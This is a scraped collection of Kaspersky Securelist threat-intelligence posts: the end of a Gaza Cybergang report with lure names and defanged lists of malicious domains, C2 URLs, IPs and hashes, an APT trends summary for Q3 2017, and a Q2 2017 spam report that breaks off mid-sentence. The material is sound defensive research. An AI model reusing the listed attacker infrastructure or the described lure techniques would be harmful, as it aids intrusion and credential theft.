2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-12.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-12.png>)\n\n \nTranslation: The primary demands of the captives in the strike of freedom and dignity\n\n### 6.9. cf9d89061917e9f48481db80e674f0e9\n\n\u0648\u062b\u0627\u0626\u0642 \u062a\u0646\u0634\u0631 \u0644\u0623\u0648\u0644 \u0645\u0631\u0647 \u0639\u0646 \u062d\u0643\u0645 \u062d\u0645\u0627\u0633 \u0644\u0642\u0637\u0627\u0639 \u063a\u0632\u0647 .exe c11516cd8c797f0182d63cdf343d08ed\n\nTranslation: Documents published for the first time on Hamas ruling of Gaza Strip\n\nC1: http://hamas-wathaq.duckdns[.]org/send/\u0648\u062b\u0627\u0626\u0642_\u062a\u0646\u0634\u0631_\u0644\u0623\u0648\u0644_\u0645\u0631\u0647_\u0639\u0646_\u062d\u0643\u0645_\u062d\u0645\u0627\u0633_\u0644\u0642\u0637\u0627\u0639_\u063a\u0632\u0647.rar\n\nC2:ping.topsite[.]life\n\nFirst seen: 16 April 2017\n\n[![](https://securelist.com/files/2017/10/171018-gaza-cybergang-13.png)](<https://securelist.com/files/2017/10/171018-gaza-cybergang-13.png>)\n\n \nTranslation: Scandals and facts published for the first time on Hamas's ruling of Gaza Strip\n\n## 7\\. Appendix 2: List of IOCs\n\n### 7.1. Malicious domain names\n\nmoreoffer[.]life \nsignup.updatesforme[.]club \nping.topsite[.]life \nalasra-paper.duckdns[.]org \nhamas-wathaq.duckdns[.]org \ndownload.data-server.cloudns[.]club \nupgrade.newshelpyou[.]com \nmanual.newphoneapp[.]com \nhnoor.newphoneapp[.]com \nlol.mynetav[.]org\n\n### 7.2. IP addresses\n\n138.68.242[.]68 \n185.86.149[.]168 \n185.11.146[.]68 \n45.32.84[.]66 \n45.32.71[.]95 \n107.161.27[.]158 \n46.246.87[.]74\n\n### 7.3. Hashes\n\n**MD5**\n\n87a67371770fda4c2650564cbb00934d \n4f3b1a2088e473c7d2373849deb4536f \nc078743eac33df15af2d9a4f24159500 \n3ff60c100b67697163291690e0c2c2b7 \na3de096598e3c9c8f3ab194edc4caa76 \n7d3426d8eb70e4486e803afb3eeac14f \n3f67231f30fa742138e713085e1279a6 \n552796e71f7ff304f91b39f5da46499b \n6fba58b9f9496cc52e78379de9f7f24e \neb521caebcf03df561443194c37911a5 \nb68fcf8feb35a00362758fc0f92f7c2e \nd87c872869023911494305ef4acbd966 \n66f144be4d4ef9c83bea528a4cd3baf3 \nB7390bc8c8a9a71a69ce4cc0c928153b \nF43188accfb6923d62fe265d6d9c0940 \n056d83c1c1b5f905d18b3c5d58ff5342 \n0ee4757ab9040a95e035a667457e4bc6 \n7bef124131ffc2ef3db349b980e52847 \n70d03e34cadb0f1e1bc6f4bf8486e4e8 \n67f48fd24bae3e63b29edccc524f4096 \n7b536c348a21c309605fa2cd2860a41d \ncf9d89061917e9f48481db80e674f0e9 \n6d6f34f7cfcb64e44d67638a2f33d619 \n86a89693a273d6962825cf1846c3b6ce \n5472d0554a0188c0ecebd065eddb9485\n\n**SHA256**\n\n0b6fe466a3ba36895208e754b155a193780c79ba8b5c1c9f02c4f7e479116e5f \n0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a \n0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa \n1f2b128d26a58a572ea1faee2c4d9dc759eb8add16d9ad0547b3f0305fea212a \n205f32cc717c2d82baeff9ff5aa9fc31967b6ae5cde22fafe14aec9c9ec62acc \n284af7a2fafdbff3bbc28b9075f469d2352758b62d182b0e056d29ee74688126 \n344dc6ece5a6dacce9050a65305d4b34865756051a6f414477b6fa381e1c1b63 \n42e4298f5162aba825309673187e27121e3f918238e81f3a6e021c03f3455154 \n44a8d0561a9cc6e24d6935ff4c35b7b7db50c4001eb01c48ea1cfd13253bc694 \n57a12f20c6bbd69b93e76d6d5a31d720046b498aa880b95b85a4f3fda28aac4f \n72b039550d31afaeee11dedf7d80333aeda5c504272d426ae0d91bc0cd82c5b0 \n72d2ad8f38e60c23c96698149507fc627664a5706a4431b96014fbf25495b529 \n788f7fd06030f87d411c61efbc52a3efca03359570353da209b2ce4ccf5b4b70 \n7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04 \n84adba3c81ad1c2a8285c31d1171f6f671492d9f3ed5ee2c7af326a9a8dc5278 \n852ccc491204f227c3da58a00f53846296454d124b23021bdb168798c8eee2fb \n86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 \n9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7e \nb597d7b5b9c2f1962257f912e911961ad0da4c28fc6a90a0b7db4e242aa007d8 \nbfb88878a22c23138a67cc25872e82d77e54036b846067ddc43e988c50379915 \nc23f715c8588c8d8725352ed515749389d898996107132b2d25749a4efc82a90 \nc47bc2c15f08655d158bb8c9d5254c804c9b6faded526be6879fa94ea4a64f72 \ndb53b35c80e8ec3f8782c4d34c83389e8e9b837a6b3cc700c1b566e4e4450ec2 \ndd9debe517717552d7422b08a477faa01badbcc4074830c080a1a1c763e1a544 \nb800d29d6e1f2f85c5bc036e927c1dae745a3c646389599b0754592d76b5564b", "cvss3": {}, "published": "2017-10-30T09:00:39", "type": "securelist", "title": "Gaza Cybergang \u2013 updated activity in 2017:", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-10-30T09:00:39", "href": "https://securelist.com/gaza-cybergang-updated-2017-activity/82765/", "id": "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-14T11:34:42", "description": "![](https://securelist.com/files/2014/08/abstraction_2.jpg)\n\n## Introduction\n\nBeginning in the second quarter of 2017, Kaspersky's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports in an effort to make the public aware of what research we have been conducting. This report serves as the next installment, focusing on important reports produced during Q3 of 2017.\n\nAs stated last quarter, these reports will serve as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, if you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Chinese-Speaking Actors\n\nThe third quarter demonstrated to us that Chinese-speaking actors have not \"disappeared\" and are still very much active, conducting espionage against a wide range of countries and industry verticals. In total, 10 of the 24 reports produced centered around activity attributed to multiple actors in this region.\n\nThe most interesting of these reports focused on two specific supply chain attacks; Netsarang / ShadowPad and CCleaner. In July 2017, we discovered a previously unknown malware framework (ShadowPad) embedded inside the installation packages hosted on the Netsarang distribution site. Netsarang is a popular server management software used throughout the world. The ShadowPad framework contained a remotely activated backdoor which could be triggered by the threat actor through a specific value in a DNS TXT record. Others in the research community have loosely attributed this attack to the threat actor Microsoft refers to as BARIUM. Following up on this supply chain attack, another was reported initially by Cisco Talos in September involving CCleaner, a popular cleaner / optimization tool for PCs. The actors responsible signed the malicious installation packages with a legitimate Piriform code signing certificate and pushed the malware between August and September.\n\nQ3 also showed China is very interested in policies and negotiations involving Russia with other countries. We reported on two separate campaigns demonstrating this interest. To date, we have observed three separate incidents where Russia and another country hold talks and are targeted shortly thereafter, IndigoZebra being the first. IronHusky was a campaign we first discovered in July targeting Russian and Mongolian government, aviation companies, and research institutes. Earlier in April, both conducted talks related to modernizing the Mongolian air defenses with Russia's help. Shortly after these talks, the two countries were targeted with a Poison Ivy variant from a Chinese-speaking threat actor. In June, India and Russia signed a much awaited agreement to expand a nuclear power plant in India, as well as further define the defense cooperation between the two countries. Very soon after, both countries energy sector were targeted with a new piece of malware we refer to as \"H2ODecomposition\". In some case this malware was masquerading as a popular Indian antivirus solution (QuickHeal). The name of the malware was derived from an initial RC5 string used in the encryption process (2H2O=2H2+O2) which describes a chemical reaction used in hydrogen fuel cells.\n\nOther reports published in the third quarter under chinese-speaking actors were mainly updates to TTPs by known adversaries such as Spring Dragon, Ocean Lotus, Blue Termite, and Bald Knight. The Spring Dragon report summarized the evolution of their malware to date. Ocean Lotus was observed conducting watering hole attacks on the ASEAN website (as done previously) but with a new toolkit. A new testing version of Emdivi was discovered in use by Blue Termite as well as their testing of CVE-2017-0199 for use. Finally, Bald Knight (AKA - Tick) was seen using their popular XXMM malware family to target Japan and South Korea.\n\nBelow is a summary of report titles produced for the Chinese region. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n 1. Analysis and evolution of Spring Dragon tools\n 2. EnergyMobster - Campaign targeting Russian-Indian energy project\n 3. IronHusky - Intelligence of Russian-Mongolian military negotiations\n 4. The Bald Knight Rises\n 5. Massive watering holes campaign targeting Asia-Pacific\n 6. Massive Watering Holes Campaign Targeting AsiaPacific - The Toolset\n 7. NetSarang software backdoored in supply chain attack - early warning\n 8. ShadowPad - popular server management software hit in supply chain attack\n 9. New BlueTermite samples and potential new wave of attacks\n 10. CCleaner backdoored - more supply chain attacks\n\n## Russian-Speaking Actors\n\nThe third quarter was a bit slower with respect to Russian speaking threat actors. We produced four total reports, two of which focused on ATM malware, one on financial targeting in Ukraine and Russia, and finally a sort of wrap-up of Sofacy activity over the summer.\n\nThe ATM related reports centered around Russian speaking actors using two previously unknown pieces of malware designed specifically for certain models. \"Cutlet Maker\" and \"ATMProxy\" both ultimately allowed the users to dispense cash at will from a chosen cartridge within the ATMs. ATMProxy was interesting since it would sit dormant on an ATM until a card with a specific hard coded number was inserted, at which point it would dispense more cash than what was requested.\n\nAnother report discussed a new technique utilizing highly targeted watering holes to target financial entities in Ukraine and Russia with Buhtrap. Buhtrap has been around since at least 2014, but this new wave of attacks was leveraging search engine optimization (SEO) to float malicious watering hole sites to the top of search results, thus providing more of a chance for valid targets to visit the malicious sites.\n\nFinally, we produced a summary report on Sofacy's summertime activity. Nothing here was groundbreaking, but rather showed the group remained active with their payloads of choice; SPLM, GAMEFISH, and XTUNNEL. Targeting also remained the same, focusing on European defense entities, Turkey, and former republics.\n\nBelow is a list of report titles for reference:\n\n 1. ATMProxy - A new way to rob ATMs\n 2. [Cutlet maker - Newly identified ATM malware families sold on Darknet](<https://securelist.com/atm-malware-is-being-sold-on-darknet-market/81871/>)\n 3. Summertime Sofacy - July 2017\n 4. Buhtrap - New wave of attacks on financial targets\n\n## English-Speaking Actors\n\nThe last quarter also had us reporting on yet another member of the Lamberts family. Red Lambert was discovered during our previous analysis of Grey Lambert and utilized hard coded SSL certificates in its command and control communications. What was most interesting about the Red Lambert is that we discovered a possible operational security (OPSEC) failure on the actor's part, leading us to a specific company who may have been responsible, in whole or in part, for the development of this Lambert malware.\n\n 1. The Red Lambert\n\n## Korean-Speaking Actors\n\nWe were also able to produce two reports on Korean speaking actors, specifically involving Scarcruft and Bluenoroff. Scarcruft was seen targeting high profile, political entities in South Korea using both destructive malware as well as malware designed more for espionage. Bluenoroff, the financially motivated arm of Lazarus, targeted a Costa Rican casino using Manuscrypt. Interestingly enough, this casino was compromised by Bluenoroff six months prior as well, indicating they potentially lost access and were attempting to get back in.\n\nReport titles focusing on Korean-speaking actors:\n\n 1. Scent of ScarCruft\n 2. Bluenoroff hit Casino with Manuscrypt\n\n## Other Activity\n\nFinally, we also wrote seven other reports on \"uncategorized\" actors in the third quarter. Without going into detail on each of these reports, we will focus on two. The first being a report on the Shadowbrokers' June 2017 malware dump. An anonymous \"customer\" who paid to get access to the dump of files posted the hashes of the files for the month, mainly due to their displeasure in what was provided for the money. We were only able to verify one of nine file hashes, which ended up being an already known version of Triple Fantasy.\n\nThe other report we'd like to highlight (\"Pisco Gone Sour\") is one involving an unknown actor targeting Chilean critical institutions with Veil , Meterpreter, and Powershell Empire. We are constantly searching for new adversaries in our daily routine and this appears to be just that. The use of publicly available tools makes it difficult to attribute this activity to a specific group, but our current assessment based on targeting is that the actor may be based somewhere in South America.\n\n 1. Dark Cyrene - politically motivated campaign in the Middle East\n 2. Pisco Gone Sour - Cyber Espionage Campaign Targeting Chile\n 3. Crystal Finance Millennium website used to launch a new wave of attacks in Ukraine\n 4. New Machete activity - August 2017\n 5. [ATMii](<https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/>)\n 6. Shadowbroker June 2017 Pack\n 7. [The Silence - new trojan attacking financial organizations](<https://securelist.com/the-silence/83009/>)\n\n## Final Thoughts\n\nNormally we would end this report with some predictions for the next quarter, but as it will be the end of the year soon, we will be doing a separate predictions report for 2018. Instead, we would like to point out one alarming trend we've observed over the last two quarters which is an increase in supply chain attacks. Since Q2, there have been at least five incidents where actors have targeted the supply chain to accomplish their goals instead of going directly after the end target; MeDoc, Netsarang, CCleaner, Crystal Finance, and Elmedia. While these incidents were not the result of just one group, it does show how the attention of many of the actors out there may be shifting in a direction that could be much more dangerous. Successfully compromising the supply chain provides easy access to a much wider target base than available through traditional means such as spear phishing. As an added benefit, these attacks can remain undetected for months, if not longer. It remains to be seen if this trend will continue into 2018, but given the successes from the five mentioned above, we feel we haven't seen the last of this type of attack in the near future.", "cvss3": {}, "published": "2017-11-14T09:41:27", "type": "securelist", "title": "APT Trends report Q3 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-11-14T09:41:27", "href": "https://securelist.com/apt-trends-report-q3-2017/83162/", "id": "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-22T10:08:53", "description": "![](https://securelist.com/files/2014/08/quarter_spam.jpg)\n\n \n\n\n## Spam: quarterly highlights\n\n### Delivery service Trojans\n\nAt the start of Q2 2017, we registered a wave of malicious mailings imitating notifications from well-known delivery services. Trojan downloaders were sent out in ZIP archives, and after being launched they downloaded other malware \u2013 Backdoor.Win32.Androm and Trojan.Win32.Kovter. The usual trick of presenting dangerous content as important delivery information was employed by the fraudsters to make recipients open the attachment. The malicious mailings targeted people from different countries and came in a variety of languages.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_1.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_1.png>)\n\nThese fake notifications from delivery services also included malicious links to infect the victim's computer and steal personal information. The fraudulent link was tied to the tracking number of a non-existent shipment and used the following format:\n\nHttp: // domain / name of delivery service __com__WebTracking__tracknum__4MH38630431475701\n\nThe domain and the sequence of letters and numbers at the end of the link varied within the same mass mailing.\n\nAfter a user clicked on the link, the Js.Downloader family Trojan was downloaded, which in turn downloaded the [banking Trojan Emotet](<https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/>). This malware was first detected in June 2014, and is still used to steal personal financial information, logins and passwords from other services, as well as to send spam, etc.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_2.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_2.png>)\n\n### WannaCry in spam\n\nIn May 2017, hundreds of thousands of computers worldwide were [infected by the WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). While the majority of similar ransomware samples require some sort of user input before a computer is infected, WannaCry could do so without any user actions. It attacks the target using a Windows exploit and then infects all computers within the local network. Like other ransomware of this type, WannaCry encrypts files on the victim's computer and demands a ransom for decryption. In these attacks, files are encrypted with the extension .wcry and become unreadable.\n\nThe media frenzy surrounding the WannaCry ransomware played into spammers' hands, as all high-profile events usually do. For example, they distributed numerous offers of services to counter the new malware, to prevent infection, training for users, etc. Scammers who earn money via fraudulent mailings also took advantage.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_3.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_3.png>)\n\nThey sent out fake notifications on behalf of well-known software vendors informing recipients that their computers had been infected with ransomware and had to be updated. The link to the supposed update, of course, led to a phishing page. We came across emails that showed the attackers hadn't taken much care when compiling their mailings, obviously hoping their victims would be in too much of a panic to notice some obvious mistakes (sender's address, URLs, etc.).\n\n### Malware in password-protected archives and the corporate sector\n\nIn the second quarter of 2017, we came across new mailings containing malicious attachments in a password-protected archive. They were obviously targeting the corporate sector.\n\nAs a rule, the distribution of password-protected archives serves two purposes. First, it is a form of social engineering, with the attackers emphasizing that all confidential data (such as business accounts) is additionally protected by a password. Second, until the files are extracted from the archive, they cannot be fully checked by antivirus software.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_4.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_4.jpg>) [![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_5.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_5.jpg>)\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_6.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_6.jpg>)\n\n_These archives contained a malicious program belonging to the Pony/FareIT family. This malware is designed to steal logins and passwords to web services stored in browsers, the URLs on which they were entered, authentication data to FTP servers, file managers, mail clients, synchronization applications, as well as crypto-currency wallets._\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_7.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_7.jpg>)\n\n_This archive contains a malicious program called Trojan-Downloader.MSWord.Agent.bkt, which is a password-protected Microsoft Word file. The document contains a malicious script that downloads other malicious software designed to steal bank data to the user's computer._\n\nIt is worth noting that the tendency to mask malicious mailings as business correspondence has increased. Spammers are now not only copying the style of business emails \u2013 they often use the actual details of real companies, copy auto-signatures and logos, and even the subject of the messages can correspond to the company profile. Judging by the domain addresses in the 'To' field and by the content of the emails, these mailings also target the B2B sector.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_8.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_8.jpg>)\n\n_This archive contained a malicious program belonging to the Loki Bot family designed to steal passwords from FTP, mail clients and passwords stored in browsers, as well as crypto-currency wallets._\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_9.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_9.jpg>)\n\n_This archive contains the Exploit.Win32.BypassUAC.bwc malicious program, designed to steal passwords for network resources and email clients. To elevate privilege, the malware uses an exploit that bypasses the protection of the Microsoft Windows UAC component. During the operation it uses legitimate utilities to restore passwords. _\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_10.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_10.jpg>)\n\n_This archive contains an XLS-file with a macro that was used to download HawkEye Keylogger to the victim's computer. This malicious program written in .NET intercepts keystrokes and collects information about the system where it operates: internal and external IP addresses, the OS version as well as the name of the security product and the firewall._\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_11.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_11.jpg>)\n\n_This archive contains two malicious files: EXE, disguised as PDF (detected as Trojan.Win32.VBKrypt.xdps) and an MSWord document with an exploit that uses the CVE-2017-0199 vulnerability. Both malicious programs download a modification of Zeus to the victim's computer._\n\nSuch targeted attacks can have different aims. In the case of ransomware, it is obvious that a company's intellectual property can be viewed as being much more valuable than the information on a private computer, so a potential victim is more likely to pay the necessary bitcoins to get it back. In the case of spyware designed to steal financial information, fraudsters can potentially hit the jackpot once they get access to a company's accounts.\n\nSpyware in the B2B sector can also be used in more sophisticated schemes of financial fraud, including MITM attacks during financial transactions. One such scheme disclosed by our colleagues is described [here](<https://securelist.com/nigerian-phishing-industrial-companies-under-attack/78565/>).\n\nInterestingly, although the payload downloaded on the victim's computer is very different, its main function is the theft of authentication data, which means that most attacks on the corporate sector have financial goals.\n\nWe shouldn't forget about the potentially dangerous situation where an attacker gains access to a corporate network and gets control of industrial equipment.\n\nOverall in the second quarter of 2017, the percentage of spam in email traffic grew slightly from the previous quarter. The number of email antivirus detections increased by 17% in Q2 vs. Q1.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Post_Component_Detections_number_Q1_Q2_EN.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Post_Component_Detections_number_Q1_Q2_EN.png>)\n\n_The number of email antivirus detections on the computers of Kaspersky Lab users,_ _Q1 and Q2 2017._\n\n### Necurs botnet continues to distribute spam\n\nThe Necurs botnet continues to distribute spam, although the volumes are much smaller than in 2016. This botnet operation is characterized by alternating periods of low and high activity, when we register up to 2 million emails a day sent to Kaspersky Lab customers. In addition to malicious mailings from the botnet, Necurs actively spreads pump-and-dump as well as dating spam:\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_13.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_13.jpg>)\n\nMalicious emails from the Necurs botnet are usually concise, contain files with DOC, PDF or other extensions. Sometimes, instead of attachments, emails include links to cloud storages such as Dropbox from where malicious files are downloaded.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_14.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_14.jpg>) [![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_15.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_15.jpg>) [![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_16.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_16.jpg>)\n\n### Spam via legal services\n\nLast quarter we wrote that in order to bypass filters, spammers often spread advertising and fraudulent offers via legitimate means. They include, for example, the 'Invite friends' field on social networking sites, notifications about comments that are usually sent to the recipient's email address, or any other method available on the various sites that allow the sending of emails to a user's list of trusted addresses. In addition, this type of spam is more difficult to detect because the source is legitimate. Spammers also like it because this type of resource makes for easy targeting. For example, they exploit job search sites to publicize easy earnings or for financial fraud:\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_17.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_17.jpg>)\n\n### Domain fraud\n\nLast quarter we discovered several different mass mailings related to the domain fraud.\n\nOne of the mailings was sent in the name of a major company involved in the registration of domain names and addressed the administrators of registered domains. They were informed that it was necessary to activate a domain to confirm their administrator status and ability to manage the domain. These measures were allegedly taken in accordance with the amendments made to regulations by ICANN (Internet Corporation for Assigned Names and Numbers).\n\nTo do this, the administrator was told they had a limited time to create a PHP file with specific content in the root directory of the site. The email also stated that failure to observe these conditions would mean the confirmation procedure had not been completed and support for the domain would be suspended.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_18.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_18.jpg>)\n\nIf the script is launched on the victim's site, the attackers would be able to gain control of the site and to run any code. In addition, the script makes it possible to collect all user data entered on the site where it is registered and run. The fact that many of these fake emails were sent to addresses belonging to banks, means we can assume that the scammers wanted to collect data entered on the website of those banks, including the logins and passwords used for Internet banking.\n\nAdministrators also found themselves the target of yet another type of domain fraud. It involved the administrator of an organization receiving an email prompting them to register their domain with search engines to help potential customers find the company on the Internet. These messages came from addresses generated on free hosting.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_19.jpg)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_19.jpg>)\n\nThis service was provided on a fee basis. In order to see the list of tariffs, the recipient was asked to click a link in the email that was \"hosted\" on a legitimate website. After choosing a tariff, the user had to fill in and send a form that asked for detailed personal information, including credit card information.\n\n## Statistics\n\n### Proportion of spam in email traffic\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Spam_Part_World_Q2_2007_EN.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Spam_Part_World_Q2_2007_EN.png>)\n\n_Percentage of spam in global email traffic, Q1 2017 and Q2 2017_\n\nIn Q2 2017, the largest percentage of spam \u2013 57.99% \u2013 was registered in April. The average share of spam in global email traffic for the second quarter amounted to 56.97%, which was 1.07 p.p. more than in the previous quarter.\n\n### Sources of spam by country\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Countries_Spam_Sources_Q2_2007_EN.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Countries_Spam_Sources_Q2_2007_EN.png>)\n\n_Sources of spam by country, Q2 2017_\n\nThe second quarter of 2017 saw a change in the top three sources of spam. Vietnam came first, accounting for 12.37% of world spam. It was followed by the previous quarter's leader the US, whose share dropped by 8.65 p.p. and accounted for 10.1%. China (8.96%, +1.19 p.p.) completed the top three.\n\nIndia was the fourth biggest source, responsible for 8.77% (+3.61 p.p.) of total spam, followed by Germany (5.06%, -0.31 p.p.).\n\nRussia, in sixth place, accounted for 4.99%, which is only 0.06 p.p. less than in the previous quarter.\n\nThe top 10 biggest sources also included Brazil (4.47%), France (4.35%), Iran (2.49%), and the Netherlands with a share of 1.96%.\n\n### Spam email size\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Spam_email_size_Q2_2017_EN.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Spam_email_size_Q2_2017_EN.png>)\n\n_Breakdown of spam emails by size, Q1 2017 and Q2 2017_\n\nIn Q2 2017, the share of small emails (up to 2 KB) in spam traffic changed only slightly and averaged 37.41%, which is 1.9 p.p. more than in the first quarter. The proportion of emails sized 2\u20135 KB remained at the same level: 4.54%; and those of 5\u201310 KB (7.83%) declined by 1.36 p.p. and accounted for 5.94%.\n\nThe proportion of emails sized 10-20 KB reached 18.31% and emails of 20-50 KB \u2014 27.16%. The proportion of more emails sized 100 KB+ was slightly more than 2%.\n\n## Malicious attachments in email\n\n### Top 10 malware families\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_TOP10_families.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_TOP10_families.png>)\n\n_TOP 10 malware families in Q2 2017_\n\n[Trojan-Downloader.JS.SLoad](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.JS.SLoad/>) (8.73%) topped the rating of the most popular malware families. Trojan-Downloader.JS.Agent (3.31%) came second, while [Trojan-PSW.Win32.Fareit](<https://threats.kaspersky.com/en/threat/Trojan-PSW.Win32.Fareit>) (3.29%) rounded off the top three.\n\nTrojan-Downloader.JS.Agent (3.05%) came fourth followed by Worm.Win32.WBVB (2.59%).\n\nNewcomers to the top 10, Backdoor.Java.QRat (1.91%) and Trojan.PDF.Phish (1.66%), occupied seventh and ninth places respectively.\n\nThe Backdoor.Java.QRat family is a cross-platform multifunctional backdoor written in Java and sold on DarkNet as malware-as-a-service (MaaS). It is typically distributed via email as a JAR attachment.\n\nTrojan.PDF.Phish is a PDF document containing a link to a phishing site where users are prompted to enter their login and password for a specific service.\n\n### Countries targeted by malicious mailshots\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Countries_Targets_Q2_2007_EN.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Countries_Targets_Q2_2007_EN.png>)\n\n_Distribution of email antivirus verdicts by country, Q2 2017_\n\nGermany (12.71%) was the country targeted most by malicious mailshots in Q2 2017. China, last quarter's leader, came second (12.09%), followed by the UK (9.11%).\n\nJapan (5.87%) was fourth, with Russia occupying fifth with a share of 5.67%. Next came Brazil (4.99%), Italy (3.96%), Vietnam (3.06%) and France (2.81%).\n\nThe US (2.31%) completed the top 10.\n\n## Phishing\n\nIn the second quarter of 2017, the Anti-Phishing system prevented 46,557,343 attempted visits to phishing pages on the computers of Kaspersky Lab users. Overall, 8.26% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q2 2017.\n\n### Geography of attacks\n\nIn Q2 2017, Brazil (18.09%) was the country where the largest percentage of users was affected by phishing attacks, although its share decreased by 1.07 p.p. compared to the previous quarter.\n\n[![](https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Geography_attacks.png)](<https://securelist.com/files/2017/08/Spam_Report_Q2_2017_Geography_attacks.png>)\n\n_Geography of phishing attacks*, Q2 2017 \n* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in that country_\n\nThe percentage of users attacked in China decreased by 7.24 p.p. and amounted to 12.85%, placing the country second in this ranking. Australia added 1.96 p.p. to the previous quarter's figure and came third with 12.69%. The percentage of attacked users in New Zealand increased to 12.06% (+ 0.12p.p.), with Azerbaijan (11.48%) in fifth. The Republic of South Africa (9.38%), Argentina (9.35%) and the UK (9.29%) rounded off this top 10.\n\nIn the second quarter, Russia (8.74%) exited this top 10 of countries with the largest percentage of users affected by phishing attacks, falling to 18th place.\n\nBrazil | 18.09% \n---|--- \nChina | 12.85% \nAustralia | 12.69% \nNew Zealand | 12.06% \nAzerbaijan | 11.48% \nCanada | 11.28% \nQatar | 10\\. 68% \nVenezuela | 10.56% \nSouth Africa | 9.38% \nArgentina | 9.35% \nUK | 9.29% \n \n** _TOP 10 countries by percentage of users attacked_**\n\n### Organizations under attack\n\n#### Rating the categories of organizations attacked by phishers\n\n_The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab's heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab's databases. It does not matter how the user attempts to open the page \u2013 by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat._\n\nIn Q2 2017, the Banks (23.49%, -2.33 p.p.), Payment systems (18.40%, +4.8 p.p.) and Online stores (9.58%, -1.31 p.p.) categories accounted for more than half (51.47%) of all registered 